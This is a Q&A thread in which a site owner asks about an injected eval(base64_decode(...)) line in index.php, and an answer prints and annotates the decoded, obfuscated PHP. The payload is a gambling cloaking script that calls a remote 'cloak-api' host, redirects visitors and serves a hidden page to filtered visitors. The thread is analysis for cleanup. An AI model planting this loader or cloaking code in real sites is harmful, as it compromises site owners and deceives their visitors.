
Hello, I found that my site had this code in index.php. Can anyone translate this code, please?

// Loader stub: base64-decodes the embedded blob and passes the result to eval(), so the real
// logic only exists at runtime. Decode it offline to read it; do not execute it.
eval(base64_decode('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'));
prapin
  • 2
    [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – ADyson Oct 19 '22 at 11:16

1 Answer


Edit:

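The decoded base64 output looks suspicious: someone has injected obfuscated code that runs through the eval() function. With the escaped strings decoded, it reads as a cloaking script that looks up each visitor's IP address and includes a different page depending on country, device and a gclid query parameter.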

decoded base64 output:

 /*
  * Reviewer annotation (not part of the decoded payload).
  *
  * The goto labels only scramble the statement order, and every string literal is written
  * with hex/octal escapes. Following the jumps from EuIN9 and decoding the escapes, the
  * script runs in this order:
  *
  *  1. include "setup.php"; set the timezone to "Asia/Bangkok".
  *  2. $ip = $_SERVER["HTTP_CF_CONNECTING_IP"], falling back to $_SERVER["REMOTE_ADDR"]
  *     when that is not set.
  *  3. Fetch JSON from https://lokliau[.]com/cloak-api/ . $PTCode (defanged here). If
  *     $_SERVER["HTTP_HOST"] is not in the returned ->list, send a "Location: " redirect
  *     to ->link[0] and die.
  *  4. Declare ismobile() (User-Agent regex for mobile devices) and gclid() (requires
  *     $_GET["gclid"] longer than 32 characters); each check is enforced only when its
  *     flag argument equals "YA", otherwise it returns true.
  *  5. Geolocate $ip via https://json.geoiplookup.io/ ; when ->success is not true, fall
  *     back to http://ip-api.com/json/ for country, country code and city.
  *  6. Read HTTP_REFERER, HTTP_USER_AGENT (default "no User-agent"), SCRIPT_NAME and
  *     SERVER_NAME, and copy $isp into $host.
  *  7. Choose the file to include:
  *       - $cloacking != "ON"                                   -> include $nonjudi; die
  *       - country code in $negara && ismobile() && gclid()    -> include $judi
  *       - IP in $banip                                        -> include $nonjudi
  *       - IP in $wlip                                         -> include $judi
  *       - anything else                                       -> include $nonjudi
  *     The final User-Agent/host test includes $nonjudi in both arms, so it does not change
  *     the outcome; it also uses google and bot as bare constants rather than quoted strings.
  *
  * Net effect: a cloaking script. Visitors matching the country/mobile/gclid filter (or an
  * allow-listed IP) get one page, everyone else gets another, so the site owner and crawlers
  * are likely to see only the second one.
  *
  * $PTCode, $cloacking, $judi, $nonjudi, $negara, $banip, $wlip, $onlymobile and $onlygclid
  * are not defined in this snippet; presumably setup.php defines them, so that file and the
  * files it points to need inspecting as well. The names suggest Indonesian ("judi" =
  * gambling, "negara" = country); treat that as a hint, not a finding.
  *
  * For triage: outbound requests from the web server to the three hosts above, an unexpected
  * setup.php beside index.php, and eval(base64_decode(...)) in PHP files are the indicators
  * this payload gives you.
  */
 goto EuIN9; YSSOD: $cek = file_get_contents("\x68\x74\164\160\x73\72\x2f\57\152\x73\x6f\156\x2e\147\x65\157\151\x70\x6c\x6f\x6f\153\165\x70\x2e\151\157\x2f" . $ip); goto gTr3W; gXUTK: date_default_timezone_set("\x41\163\151\141\x2f\x42\141\156\x67\153\157\153"); goto IHNBX; XiYvO: if ($cloacking != "\117\x4e") { include $nonjudi; die; } else { if (in_array($countrycode, $negara) && ismobile($onlymobile) && gclid($onlygclid)) { include $judi; } else { if (in_array($ip, $banip)) { include $nonjudi; } else { if (in_array($ip, $wlip)) { include $judi; } else { if (strpos(strtolower($http_user_agent), google) !== false || strpos(strtolower($http_user_agent), bot) !== false || strpos(strtolower($host), google) !== false) { include $nonjudi; } else { include $nonjudi; } } } } } goto ZoMJj; SV4DE: $referer = isset($_SERVER["\x48\124\124\120\x5f\122\x45\x46\x45\x52\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\105\122\x45\x52"] : ''; goto g69de; dtPIm: if (!isset($ip)) { $ip = $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; } goto RSiEb; KqEPl: $web_page = $_SERVER["\x53\x43\122\111\120\124\x5f\x4e\101\115\105"]; goto BECJH; g69de: $http_user_agent = isset($_SERVER["\110\x54\x54\x50\137\125\123\x45\122\x5f\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\124\x50\137\x55\x53\x45\122\137\101\x47\105\116\124"] : "\156\157\x20\125\x73\145\162\55\x61\x67\145\x6e\164"; goto KqEPl; RSiEb: $pl = file_get_contents("\x68\164\164\160\x73\x3a\57\57\154\x6f\153\x6c\x69\141\x75\x2e\x63\x6f\x6d\x2f\x63\x6c\x6f\x61\153\55\x61\x70\151\x2f" . 
$PTCode); goto CAcoh; IHNBX: $ip = $_SERVER["\110\124\x54\120\x5f\103\x46\x5f\103\117\116\116\x45\103\x54\111\x4e\x47\137\x49\x50"]; goto dtPIm; LpqWM: $host = $isp; goto XiYvO; EuIN9: include "\163\x65\x74\165\x70\56\160\150\160"; goto gXUTK; Ajf18: function gclid($g) { if ($g == "\131\101") { if (isset($_GET["\x67\x63\154\151\x64"]) && !empty($_GET["\147\143\x6c\x69\x64"]) && strlen($_GET["\147\143\154\151\x64"]) > 32) { return true; } else { return false; } } else { return true; } } goto YSSOD; BECJH: $domain = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\x41\115\x45"]; goto LpqWM; CAcoh: $o = json_decode($pl); goto hQLc8; uh5h_: if (!in_array($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\124"], $list)) { header("\x4c\157\x63\x61\x74\151\x6f\156\72\40" . $fbl[0]); die; } goto bINpt; gTr3W: $status = json_decode($cek)->success; goto t80Uu; hQLc8: $list = $o->list; goto BVHYz; bINpt: function ismobile($m) { if ($m == "\x59\x41") { return preg_match("\57\x28\x61\156\144\x72\157\x69\144\x7c\141\x76\x61\156\x74\147\157\x7c\142\x6c\x61\143\x6b\142\145\x72\x72\x79\174\x62\x6f\154\164\x7c\x62\x6f\157\x73\164\174\x63\x72\x69\143\153\145\164\174\144\x6f\143\x6f\x6d\157\x7c\146\157\156\145\x7c\150\x69\160\x74\x6f\x70\174\x6d\x69\156\x69\174\155\x6f\x62\151\x7c\x70\x61\154\x6d\x7c\x70\150\x6f\156\145\174\160\151\145\x7c\x74\x61\142\x6c\145\x74\x7c\165\x70\134\56\142\162\157\167\163\x65\x72\x7c\165\160\x5c\x2e\154\x69\x6e\153\x7c\x77\145\x62\x6f\x73\x7c\167\157\163\51\57\151", $_SERVER["\x48\x54\x54\120\x5f\125\123\x45\122\x5f\x41\107\105\116\x54"]); } else { return true; } } goto Ajf18; BVHYz: $fbl = $o->link; goto uh5h_; t80Uu: if ($status != true) { $ipapi = file_get_contents("\150\x74\x74\160\x3a\57\x2f\151\x70\55\x61\x70\x69\x2e\x63\x6f\155\x2f\152\163\157\156\x2f" . 
$ip); $country = json_decode($ipapi)->country; $countrycode = json_decode($ipapi)->countryCode; $city = json_decode($ipapi)->city; $org = json_decode($cek)->org; $isp = json_decode($cek)->isp; } else { $country = json_decode($cek)->country_name; $countrycode = json_decode($cek)->country_code; $city = json_decode($cek)->city; $org = json_decode($cek)->asn_org; $isp = json_decode($cek)->isp; } goto SV4DE; ZoMJj: 
rafathasan
  • So what is that code? I really don't know how to translate it; I only know PHP. How can it run as PHP code? – Hendy Mylor Oct 19 '22 at 10:41
  • @HendyMylor you could run it with `eval()`, just like in your own example...but that's really not a good idea - never execute code you don't understand. What you _do_ need to try and understand is how it might have got there, and how to prevent that from happening again. The fact there's code that you don't know anything about existing on your website is a really bad sign for your security. You should assume it's malicious, and delete it without executing it yourself, and take steps to prevent it from being put there again. – ADyson Oct 19 '22 at 11:17